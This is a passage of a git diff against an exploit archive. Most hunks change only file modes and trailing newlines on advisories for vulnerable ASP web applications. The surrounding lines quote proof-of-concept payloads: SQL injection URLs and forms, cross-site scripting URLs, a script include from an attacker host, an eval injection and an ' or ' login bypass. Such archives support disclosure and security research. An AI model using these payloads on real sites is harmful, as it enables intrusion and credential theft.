-http://someserver.com/cpaintfile.asp?cpaint_function=response.write&cpaint_argument[]=2")%20%26%20eval("malicious code \ No newline at end of file +http://someserver.com/cpaintfile.asp?cpaint_function=response.write&cpaint_argument[]=2")%20%26%20eval("malicious code \ No newline at end of file diff --git a/platforms/asp/webapps/26291.txt b/platforms/asp/webapps/26291.txt old mode 100755 new mode 100644 index 23931c3f8..3f60a8843 --- a/platforms/asp/webapps/26291.txt +++ b/platforms/asp/webapps/26291.txt @@ -7,4 +7,4 @@ Successful exploitation could result in a compromise of the application, disclos <form action="http://www.example.com/m23Basket/AddItem.asp?idProduct=6" method="POST"> <input type="hidden" name="idOption_Dropdown_2" value="'[SQL INJECTION]"> <input type="Submit" name="submit" value="Test Exploit"> -</form> \ No newline at end of file +</form> \ No newline at end of file diff --git a/platforms/asp/webapps/26333.html b/platforms/asp/webapps/26333.html old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/26334.txt b/platforms/asp/webapps/26334.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/26335.txt b/platforms/asp/webapps/26335.txt old mode 100755 new mode 100644 index 1af226218..85976e0a4 --- a/platforms/asp/webapps/26335.txt +++ b/platforms/asp/webapps/26335.txt @@ -7,4 +7,4 @@ An attacker may leverage these issues to have arbitrary script code executed in http://www.example.com/target/search.asp?strSQL=SELECT+%2A+FROM+pages+where+1=2+union +all+select+'01','02','%3CScRiPT%20src=http://h4cK3r/devil_Script/%3E' -,null,null,null,null,null,null+from+control \ No newline at end of file +,null,null,null,null,null,null+from+control \ No newline at end of file diff --git a/platforms/asp/webapps/26351.txt b/platforms/asp/webapps/26351.txt old mode 100755 new mode 100644 index 11d0ad83e..7cb0b649e --- a/platforms/asp/webapps/26351.txt +++ b/platforms/asp/webapps/26351.txt @@ -4,4 +4,4 @@ BackOffice Plus is prone to multiple cross-site scripting vulnerabilities. These An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/backOfficePlus/comersus_backoffice_searchItemForm.asp?forwardTo1=[XSS-CODE]comersus_backoffice_listAssignedCategories.asp&forwardTo2=[XSS-CODE]&nameFT1=[XSS-CODE]Select&nameFT2=[XSS-CODE] \ No newline at end of file +http://www.example.com/backOfficePlus/comersus_backoffice_searchItemForm.asp?forwardTo1=[XSS-CODE]comersus_backoffice_listAssignedCategories.asp&forwardTo2=[XSS-CODE]&nameFT1=[XSS-CODE]Select&nameFT2=[XSS-CODE] \ No newline at end of file diff --git a/platforms/asp/webapps/2642.asp b/platforms/asp/webapps/2642.asp old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/26426.html b/platforms/asp/webapps/26426.html old mode 100755 new mode 100644 index 6f4323d31..6caabec8d --- a/platforms/asp/webapps/26426.html +++ b/platforms/asp/webapps/26426.html @@ -28,4 +28,4 @@ of Iran</a></p> <input type="hidden" name="userid" value="[SQL Injection}"> <input type="hidden" name="passwd" value="1"> <input type="submit" value="Submit" name="submit"> -</form></html> \ No newline at end of file +</form></html> \ No newline at end of file diff --git a/platforms/asp/webapps/26429.txt b/platforms/asp/webapps/26429.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/26430.txt b/platforms/asp/webapps/26430.txt old mode 100755 new mode 100644 index 5aad367b3..33bd78d29 --- a/platforms/asp/webapps/26430.txt +++ b/platforms/asp/webapps/26430.txt @@ -8,4 +8,4 @@ It should be noted these vulnerabilities can only be exploited if a non-privileg http://www.example.com/reports/default.asp?sort=[ReportImpact_Name]&Dir=asc&SearchText=';StatusFilter=ERRR&computerFilter=187&impactFilter=29&saveFilter=save&Page=rep http://www.example.com/reports/default.asp?sort=[ReportImpact_Name]&Dir=asc&SearchText=CIRT.DK&StatusFilter=';&computerFilter=187&impactFilter=29&saveFilter=save&Page=rep -http://www.example.com/reports/default.asp?sort=[ReportImpact_Name]&Dir=asc&SearchText=CIRT.DK&StatusFilter=ERRR&computerFilter=';&impactFilter=29&saveFilter=save&Page=rep \ No newline at end of file +http://www.example.com/reports/default.asp?sort=[ReportImpact_Name]&Dir=asc&SearchText=CIRT.DK&StatusFilter=ERRR&computerFilter=';&impactFilter=29&saveFilter=save&Page=rep \ No newline at end of file diff --git a/platforms/asp/webapps/26435.txt b/platforms/asp/webapps/26435.txt old mode 100755 new mode 100644 index 74a4bae74..01af6fef7 --- a/platforms/asp/webapps/26435.txt +++ b/platforms/asp/webapps/26435.txt @@ -4,4 +4,4 @@ ASP Fast Forum is prone to a cross-site scripting vulnerability. This issue is d An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/forum/error.asp?error=[XSS] \ No newline at end of file +http://www.example.com/forum/error.asp?error=[XSS] \ No newline at end of file diff --git a/platforms/asp/webapps/26439.txt b/platforms/asp/webapps/26439.txt old mode 100755 new mode 100644 index 2f95ffec7..b5042e547 --- a/platforms/asp/webapps/26439.txt +++ b/platforms/asp/webapps/26439.txt @@ -4,4 +4,4 @@ Snitz Forum is prone to a cross-site scripting vulnerability. This issue is due An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/post.asp?method=Topic&FORUM_ID=1&CAT_ID=1&Forum_Title=General+chat&type="><script>alert("PWND")</script> \ No newline at end of file +http://www.example.com/post.asp?method=Topic&FORUM_ID=1&CAT_ID=1&Forum_Title=General+chat&type="><script>alert("PWND")</script> \ No newline at end of file diff --git a/platforms/asp/webapps/26444.txt b/platforms/asp/webapps/26444.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/26473.txt b/platforms/asp/webapps/26473.txt old mode 100755 new mode 100644 index 1665bffb1..95d58c187 --- a/platforms/asp/webapps/26473.txt +++ b/platforms/asp/webapps/26473.txt @@ -6,4 +6,4 @@ The application does properly verify access privileges and allows the attacker t Version 1.01 is affected; other versions may also be vulnerable. -http://www.example.com/admin/view.asp \ No newline at end of file +http://www.example.com/admin/view.asp \ No newline at end of file diff --git a/platforms/asp/webapps/26537.html b/platforms/asp/webapps/26537.html old mode 100755 new mode 100644 index cdbe2dc92..b1a0d7d9c --- a/platforms/asp/webapps/26537.html +++ b/platforms/asp/webapps/26537.html @@ -15,4 +15,4 @@ By ConcorDHacK")</script> <a href="http://hackzord-security.fr.tc">www.hackzord-security.fr.tc</a> </form> </body> -</HTML> \ No newline at end of file +</HTML> \ No newline at end of file diff --git a/platforms/asp/webapps/2661.asp b/platforms/asp/webapps/2661.asp old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/2662.txt b/platforms/asp/webapps/2662.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/26701.txt b/platforms/asp/webapps/26701.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/26702.txt b/platforms/asp/webapps/26702.txt old mode 100755 new mode 100644 index 367e7fe63..e67a0ce52 --- a/platforms/asp/webapps/26702.txt +++ b/platforms/asp/webapps/26702.txt @@ -4,4 +4,4 @@ ASPS Shopping Cart is prone to multiple cross-site scripting vulnerabilities. Th An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. -http://www.example.com/products/bsearch.asp?b_search=%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E&x=12&y=7 \ No newline at end of file +http://www.example.com/products/bsearch.asp?b_search=%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E&x=12&y=7 \ No newline at end of file diff --git a/platforms/asp/webapps/26704.txt b/platforms/asp/webapps/26704.txt old mode 100755 new mode 100644 index 82f55541a..162d78d3d --- a/platforms/asp/webapps/26704.txt +++ b/platforms/asp/webapps/26704.txt @@ -4,4 +4,4 @@ Solupress News is prone to a cross-site scripting vulnerability. This issue is d An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/search.asp?option=simple&keywords=%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E&submit1=Find \ No newline at end of file +http://www.example.com/search.asp?option=simple&keywords=%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E&submit1=Find \ No newline at end of file diff --git a/platforms/asp/webapps/26705.txt b/platforms/asp/webapps/26705.txt old mode 100755 new mode 100644 index 78c23f948..968dbdd36 --- a/platforms/asp/webapps/26705.txt +++ b/platforms/asp/webapps/26705.txt @@ -4,4 +4,4 @@ SiteBeater News is prone to a cross-site scripting vulnerability. This issue is An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/ArticleDisplay/Archive.asp?DOMAIN_Link=&sSort=SubmitDate&iSearchID=389&sKeywords=%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E \ No newline at end of file +http://www.example.com/ArticleDisplay/Archive.asp?DOMAIN_Link=&sSort=SubmitDate&iSearchID=389&sKeywords=%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E \ No newline at end of file diff --git a/platforms/asp/webapps/26742.txt b/platforms/asp/webapps/26742.txt old mode 100755 new mode 100644 index 9dd09ab77..a20cd2681 --- a/platforms/asp/webapps/26742.txt +++ b/platforms/asp/webapps/26742.txt @@ -4,4 +4,4 @@ DuPortalPro is prone to a cross-site scripting vulnerability. This issue is due An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/demos/DUportalPro34Demo/home/password.asp?result=[XSS] \ No newline at end of file +http://www.example.com/demos/DUportalPro34Demo/home/password.asp?result=[XSS] \ No newline at end of file diff --git a/platforms/asp/webapps/26743.txt b/platforms/asp/webapps/26743.txt old mode 100755 new mode 100644 index 9a6155143..d999e51e5 --- a/platforms/asp/webapps/26743.txt +++ b/platforms/asp/webapps/26743.txt @@ -8,4 +8,4 @@ Versions 2.x and prior are vulnerable; other versions may also be affected. http://www.example.com/kb.asp?a=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E -http://www.example.com/kb.asp?ID=210&a=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E \ No newline at end of file +http://www.example.com/kb.asp?ID=210&a=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E \ No newline at end of file diff --git a/platforms/asp/webapps/26744.txt b/platforms/asp/webapps/26744.txt old mode 100755 new mode 100644 index 76ea561e0..23d6bbcc4 --- a/platforms/asp/webapps/26744.txt +++ b/platforms/asp/webapps/26744.txt @@ -9,4 +9,4 @@ Versions 3.x and prior are vulnerable; other versions may also be affected. http://www.example.com/search.asp?sort=ed&L=[XSS] http://www.example.com/search.asp?sort=[XSS] http://www.example.com/search.asp?sort=ed&L=1&category=[XSS] -http://www.example.com/search.asp?sort=ed&L=1&category=65&categoryname=[XSS] \ No newline at end of file +http://www.example.com/search.asp?sort=ed&L=1&category=65&categoryname=[XSS] \ No newline at end of file diff --git a/platforms/asp/webapps/26745.txt b/platforms/asp/webapps/26745.txt old mode 100755 new mode 100644 index 27a1f73a7..01e206ac6 --- a/platforms/asp/webapps/26745.txt +++ b/platforms/asp/webapps/26745.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to have arbitrary script code executed in th Versions 4.0 is vulnerable; prior versions may also be affected. -http://www.example.com/search.asp?searchtxt=[XSS] \ No newline at end of file +http://www.example.com/search.asp?searchtxt=[XSS] \ No newline at end of file diff --git a/platforms/asp/webapps/26746.txt b/platforms/asp/webapps/26746.txt old mode 100755 new mode 100644 index 479da920e..21e9d1da2 --- a/platforms/asp/webapps/26746.txt +++ b/platforms/asp/webapps/26746.txt @@ -6,4 +6,4 @@ A successful exploit could allow an attacker to compromise the application, acce A-FAQ 1.0 and earlier versions are vulnerable; other versions may also be affected. -http://www.example.com/faqDspItem.asp?faqid=[SQL] \ No newline at end of file +http://www.example.com/faqDspItem.asp?faqid=[SQL] \ No newline at end of file diff --git a/platforms/asp/webapps/26747.txt b/platforms/asp/webapps/26747.txt old mode 100755 new mode 100644 index 2221ceed6..f143b2c4d --- a/platforms/asp/webapps/26747.txt +++ b/platforms/asp/webapps/26747.txt @@ -6,4 +6,4 @@ A successful exploit could allow an attacker to compromise the application, acce A-FAQ 1.0 and earlier versions are vulnerable; other versions may also be affected. -http://www.example.com/faqDsp.asp?catcode=[SQL] \ No newline at end of file +http://www.example.com/faqDsp.asp?catcode=[SQL] \ No newline at end of file diff --git a/platforms/asp/webapps/26759.txt b/platforms/asp/webapps/26759.txt old mode 100755 new mode 100644 index 942510423..04885d7db --- a/platforms/asp/webapps/26759.txt +++ b/platforms/asp/webapps/26759.txt @@ -4,4 +4,4 @@ ASPMForum is prone to multiple SQL injection vulnerabilities. These issues are d Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/aspmforum/forum.asp?baslik=[sql injection] \ No newline at end of file +http://www.example.com/aspmforum/forum.asp?baslik=[sql injection] \ No newline at end of file diff --git a/platforms/asp/webapps/26760.txt b/platforms/asp/webapps/26760.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/26777.txt b/platforms/asp/webapps/26777.txt old mode 100755 new mode 100644 index 423eca5f8..39e85fe1d --- a/platforms/asp/webapps/26777.txt +++ b/platforms/asp/webapps/26777.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to have arbitrary script code executed in th An attacker may also leverage this issue to pass malicious input to database queries, resulting in modification of query logic or other attacks. Successful exploitation could also result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/searchdb.asp?q=[CODE]&mode=AND&Submit=Search \ No newline at end of file +http://www.example.com/searchdb.asp?q=[CODE]&mode=AND&Submit=Search \ No newline at end of file diff --git a/platforms/asp/webapps/26806.txt b/platforms/asp/webapps/26806.txt old mode 100755 new mode 100644 index bd2d886b1..a31b470f4 --- a/platforms/asp/webapps/26806.txt +++ b/platforms/asp/webapps/26806.txt @@ -57,4 +57,4 @@ HTTP/1.1 Solution: No Solution has yet been provided. -Please contact the vendor. \ No newline at end of file +Please contact the vendor. \ No newline at end of file diff --git a/platforms/asp/webapps/26820.txt b/platforms/asp/webapps/26820.txt old mode 100755 new mode 100644 index c27e08ad9..7f8e5a022 --- a/platforms/asp/webapps/26820.txt +++ b/platforms/asp/webapps/26820.txt @@ -4,4 +4,4 @@ XM Forum is prone to a cross-site scripting vulnerability. This issue is due to An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/forum/forum.asp?forum_id=3&forum_title=[XSS] \ No newline at end of file +http://www.example.com/forum/forum.asp?forum_id=3&forum_title=[XSS] \ No newline at end of file diff --git a/platforms/asp/webapps/26821.txt b/platforms/asp/webapps/26821.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/26822.txt b/platforms/asp/webapps/26822.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/26823.txt b/platforms/asp/webapps/26823.txt old mode 100755 new mode 100644 index ff01e4451..4916e2292 --- a/platforms/asp/webapps/26823.txt +++ b/platforms/asp/webapps/26823.txt @@ -4,4 +4,4 @@ ASPBB is prone to multiple SQL injection vulnerabilities. These issues are due t Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/aspbb/profile.asp/PROFILE_ID=[sql injection] \ No newline at end of file +http://www.example.com/aspbb/profile.asp/PROFILE_ID=[sql injection] \ No newline at end of file diff --git a/platforms/asp/webapps/2683.txt b/platforms/asp/webapps/2683.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/2684.txt b/platforms/asp/webapps/2684.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/26873.txt b/platforms/asp/webapps/26873.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/26874.txt b/platforms/asp/webapps/26874.txt old mode 100755 new mode 100644 index 1979588c9..3a994cff3 --- a/platforms/asp/webapps/26874.txt +++ b/platforms/asp/webapps/26874.txt @@ -6,4 +6,4 @@ Successful exploitation could result in a compromise of the application, disclos Acidcat CMS version 2.1.13 and prior are vulnerable; other versions may also be affected. -http://www.example.com/acidcat/databases/acidcat.mdb \ No newline at end of file +http://www.example.com/acidcat/databases/acidcat.mdb \ No newline at end of file diff --git a/platforms/asp/webapps/26875.txt b/platforms/asp/webapps/26875.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/26876.txt b/platforms/asp/webapps/26876.txt old mode 100755 new mode 100644 index 3d6d2ccd5..11007a742 --- a/platforms/asp/webapps/26876.txt +++ b/platforms/asp/webapps/26876.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to have arbitrary script code executed in th Allinta versions 2.3.2 and earlier are reportedly affected by this vulnerability. -http://example.com/search.asp?searchQuery=[XSS]&go=Search&submitted=true \ No newline at end of file +http://example.com/search.asp?searchQuery=[XSS]&go=Search&submitted=true \ No newline at end of file diff --git a/platforms/asp/webapps/26903.txt b/platforms/asp/webapps/26903.txt old mode 100755 new mode 100644 index 673dcaf73..a9ca7f0c9 --- a/platforms/asp/webapps/26903.txt +++ b/platforms/asp/webapps/26903.txt @@ -6,4 +6,4 @@ A successful exploit could allow an attacker to compromise the application, acce http://www.example.com/Page.asp?PageID=[XSS] http://www.example.com/Page.asp?PageID=1&SiteNodeID=[XSS] -http://www.example.com/Page.asp?PageID=1&SiteNodeID=[SQL] \ No newline at end of file +http://www.example.com/Page.asp?PageID=1&SiteNodeID=[SQL] \ No newline at end of file diff --git a/platforms/asp/webapps/26926.txt b/platforms/asp/webapps/26926.txt old mode 100755 new mode 100644 index e8adb5748..09496f7e2 --- a/platforms/asp/webapps/26926.txt +++ b/platforms/asp/webapps/26926.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to have arbitrary script code executed in th PortalApp 4.0 and prior are vulnerable. -http://www.example.com/login.asp?ret_page=[XSS] \ No newline at end of file +http://www.example.com/login.asp?ret_page=[XSS] \ No newline at end of file diff --git a/platforms/asp/webapps/26927.txt b/platforms/asp/webapps/26927.txt old mode 100755 new mode 100644 index 9754d0d15..a7710424f --- a/platforms/asp/webapps/26927.txt +++ b/platforms/asp/webapps/26927.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to have arbitrary script code executed in th Version 3.3. and prior are vulnerable; other versions may also be affected. -http://www.example.com/login.asp?ret_page=[XSS] \ No newline at end of file +http://www.example.com/login.asp?ret_page=[XSS] \ No newline at end of file diff --git a/platforms/asp/webapps/26928.txt b/platforms/asp/webapps/26928.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/26929.txt b/platforms/asp/webapps/26929.txt old mode 100755 new mode 100644 index 086a445e5..b0813d9ac --- a/platforms/asp/webapps/26929.txt +++ b/platforms/asp/webapps/26929.txt @@ -8,4 +8,4 @@ Version 3.3. and prior are vulnerable; other versions may also be affected. http://www.example.com/content.asp?CatId=&ContentType=&keywords=r0t&search=%3E&do_search=[XSS] -http://www.example.com/content.asp?CatId=&ContentType=&keywords=r0t&search=[XSS] \ No newline at end of file +http://www.example.com/content.asp?CatId=&ContentType=&keywords=r0t&search=[XSS] \ No newline at end of file diff --git a/platforms/asp/webapps/26930.txt b/platforms/asp/webapps/26930.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/26931.txt b/platforms/asp/webapps/26931.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/26932.txt b/platforms/asp/webapps/26932.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/26934.txt b/platforms/asp/webapps/26934.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/26935.txt b/platforms/asp/webapps/26935.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/26936.txt b/platforms/asp/webapps/26936.txt old mode 100755 new mode 100644 index 312fc1845..6d0fbfeb3 --- a/platforms/asp/webapps/26936.txt +++ b/platforms/asp/webapps/26936.txt @@ -4,4 +4,4 @@ ProjectApp is prone to multiple cross-site scripting vulnerabilities. These issu An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. These may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/default.asp?skin_number=[XSS] \ No newline at end of file +http://www.example.com/default.asp?skin_number=[XSS] \ No newline at end of file diff --git a/platforms/asp/webapps/26940.txt b/platforms/asp/webapps/26940.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/26941.txt b/platforms/asp/webapps/26941.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/26942.txt b/platforms/asp/webapps/26942.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/26943.txt b/platforms/asp/webapps/26943.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/26944.txt b/platforms/asp/webapps/26944.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/26945.txt b/platforms/asp/webapps/26945.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/26946.txt b/platforms/asp/webapps/26946.txt old mode 100755 new mode 100644 index 319de4aba..84f1a6f11 --- a/platforms/asp/webapps/26946.txt +++ b/platforms/asp/webapps/26946.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to have arbitrary script code executed in Version 2.3 of Commercial Interactive Media SCOOP! is reportedly vulnerable to these issues; other versions may also be affected. -http://www.example.com/requestDemo.asp?example7=[XSS] \ No newline at end of file +http://www.example.com/requestDemo.asp?example7=[XSS] \ No newline at end of file diff --git a/platforms/asp/webapps/26947.txt b/platforms/asp/webapps/26947.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/26948.txt b/platforms/asp/webapps/26948.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/26949.txt b/platforms/asp/webapps/26949.txt old mode 100755 new mode 100644 index 6fa1172e9..52a64d3ab --- a/platforms/asp/webapps/26949.txt +++ b/platforms/asp/webapps/26949.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to have arbitrary script code executed in Version 6.6 of Sitekit is reportedly vulnerable to these issues; prior versions may also be affected. -http://www.example.com/registration-form.html?ClickFrom=[xss] \ No newline at end of file +http://www.example.com/registration-form.html?ClickFrom=[xss] \ No newline at end of file diff --git a/platforms/asp/webapps/26963.txt b/platforms/asp/webapps/26963.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/26964.txt b/platforms/asp/webapps/26964.txt old mode 100755 new mode 100644 index 21067c96e..8fc99b928 --- a/platforms/asp/webapps/26964.txt +++ b/platforms/asp/webapps/26964.txt @@ -4,4 +4,4 @@ QP7.Enterprise is prone to multiple SQL injection vulnerabilities. These issues Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/news.asp?p_pagealias=news&p_news_id=1[SQL] \ No newline at end of file +http://www.example.com/news.asp?p_pagealias=news&p_news_id=1[SQL] \ No newline at end of file diff --git a/platforms/asp/webapps/26969.txt b/platforms/asp/webapps/26969.txt old mode 100755 new mode 100644 index dff092569..5665dd66f --- a/platforms/asp/webapps/26969.txt +++ b/platforms/asp/webapps/26969.txt @@ -5,4 +5,4 @@ Tangora Portal CMS is prone to a cross-site scripting vulnerability. This issue An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. /page1631.aspx?action=[XSS] -/page496.aspx?action=[XSS] \ No newline at end of file +/page496.aspx?action=[XSS] \ No newline at end of file diff --git a/platforms/asp/webapps/26991.html b/platforms/asp/webapps/26991.html old mode 100755 new mode 100644 index a0d357c2c..be67478b2 --- a/platforms/asp/webapps/26991.html +++ b/platforms/asp/webapps/26991.html @@ -30,4 +30,4 @@ of Iran</a></p> <input type="hidden" name="txtUserName" value="[SQL INJECTION]"> <input type="hidden" name="txtUserPass" value="1"> <input type="submit" value="Submit" name="submit"> -</form></html> \ No newline at end of file +</form></html> \ No newline at end of file diff --git a/platforms/asp/webapps/27034.txt b/platforms/asp/webapps/27034.txt old mode 100755 new mode 100644 index aa5257216..71477f498 --- a/platforms/asp/webapps/27034.txt +++ b/platforms/asp/webapps/27034.txt @@ -4,4 +4,4 @@ OnePlug CMS is prone to multiple SQL-injection vulnerabilities. These issues are Successful exploitation could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation. -http://www.example.com/press/details.asp?Press_Release_ID=[SQL] \ No newline at end of file +http://www.example.com/press/details.asp?Press_Release_ID=[SQL] \ No newline at end of file diff --git a/platforms/asp/webapps/27035.txt b/platforms/asp/webapps/27035.txt old mode 100755 new mode 100644 index 97d5efe7a..c7af7ecfb --- a/platforms/asp/webapps/27035.txt +++ b/platforms/asp/webapps/27035.txt @@ -4,4 +4,4 @@ OnePlug CMS is prone to multiple SQL-injection vulnerabilities. These issues are Successful exploitation could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation. -http://www.example.com/services/details.asp?Service_ID=[SQL] \ No newline at end of file +http://www.example.com/services/details.asp?Service_ID=[SQL] \ No newline at end of file diff --git a/platforms/asp/webapps/27036.txt b/platforms/asp/webapps/27036.txt old mode 100755 new mode 100644 index 4648a0f23..71b6cc754 --- a/platforms/asp/webapps/27036.txt +++ b/platforms/asp/webapps/27036.txt @@ -4,4 +4,4 @@ OnePlug CMS is prone to multiple SQL-injection vulnerabilities. These issues are Successful exploitation could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation. -http://www.example.com/products/details.asp?Product_ID=[SQL] \ No newline at end of file +http://www.example.com/products/details.asp?Product_ID=[SQL] \ No newline at end of file diff --git a/platforms/asp/webapps/27063.txt b/platforms/asp/webapps/27063.txt old mode 100755 new mode 100644 index d0c9d6d92..9eaa450b0 --- a/platforms/asp/webapps/27063.txt +++ b/platforms/asp/webapps/27063.txt @@ -4,4 +4,4 @@ WebWiz Forums is prone to a cross-site scripting vulnerability. This issue is du An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/[webwizdir]/search_form.asp?ReturnPage=Search&search=XSS&searchMode=allwords&searchIn=Topic&forum=0&searchSort=dateDESC&SearchPagePosition=1 \ No newline at end of file +http://www.example.com/[webwizdir]/search_form.asp?ReturnPage=Search&search=XSS&searchMode=allwords&searchIn=Topic&forum=0&searchSort=dateDESC&SearchPagePosition=1 \ No newline at end of file diff --git a/platforms/asp/webapps/27071.txt b/platforms/asp/webapps/27071.txt old mode 100755 new mode 100644 index 64e74358a..c6b3e5087 --- a/platforms/asp/webapps/27071.txt +++ b/platforms/asp/webapps/27071.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to have arbitrary script code executed in th FogBugz versions 4.029 and prior are vulnerable. -http://www.example.com/default.asp?pg=pgLogon&dest=[XSS] \ No newline at end of file +http://www.example.com/default.asp?pg=pgLogon&dest=[XSS] \ No newline at end of file diff --git a/platforms/asp/webapps/27079.txt b/platforms/asp/webapps/27079.txt old mode 100755 new mode 100644 index 90efcc4fa..ed01d550d --- a/platforms/asp/webapps/27079.txt +++ b/platforms/asp/webapps/27079.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to have arbitrary script code executed in th Version 3.2.8 is reported vulnerable; other versions may also be affected. -http://www.example.com/forgotPassword.asp?txtEmailAddress=[XSS] \ No newline at end of file +http://www.example.com/forgotPassword.asp?txtEmailAddress=[XSS] \ No newline at end of file diff --git a/platforms/asp/webapps/27083.txt b/platforms/asp/webapps/27083.txt old mode 100755 new mode 100644 index 4cab40282..1625e8355 --- a/platforms/asp/webapps/27083.txt +++ b/platforms/asp/webapps/27083.txt @@ -4,4 +4,4 @@ SimpleBlog is prone to multiple input validation vulnerabilities. These issues a Successful exploitation of these vulnerabilities could result in a compromise of the application, disclosure or modification of data, or the theft of cookie-based authentication credentials. They may also permit an attacker to exploit vulnerabilities in the underlying database implementation as well as other attacks. -http://www.example.com/simpleblog/?view=archives&month='&year=2006 \ No newline at end of file +http://www.example.com/simpleblog/?view=archives&month='&year=2006 \ No newline at end of file diff --git a/platforms/asp/webapps/27142.txt b/platforms/asp/webapps/27142.txt old mode 100755 new mode 100644 index 8d37f12f6..e4a89fd45 --- a/platforms/asp/webapps/27142.txt +++ b/platforms/asp/webapps/27142.txt @@ -11,4 +11,4 @@ http://www.example.com/[Forum target]/login.asp username: admin -password: ' or ' \ No newline at end of file +password: ' or ' \ No newline at end of file diff --git a/platforms/asp/webapps/27143.txt b/platforms/asp/webapps/27143.txt old mode 100755 new mode 100644 index c80fdf533..9c314b3b4 --- a/platforms/asp/webapps/27143.txt +++ b/platforms/asp/webapps/27143.txt @@ -5,4 +5,4 @@ ZixForum is prone to multiple SQL-injection vulnerabilities. These issues are du Successful exploitation could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation. -http://www.example.com/forum/forum.asp?pageid=1&H_ID=9 [ SQL INJEC] \ No newline at end of file +http://www.example.com/forum/forum.asp?pageid=1&H_ID=9 [ SQL INJEC] \ No newline at end of file diff --git a/platforms/asp/webapps/27151.txt b/platforms/asp/webapps/27151.txt old mode 100755 new mode 100644 index fdf90a094..030022a8e --- a/platforms/asp/webapps/27151.txt +++ b/platforms/asp/webapps/27151.txt @@ -9,4 +9,4 @@ Version 8.0 and earlier are reported to be vulnerable; other versions may also b 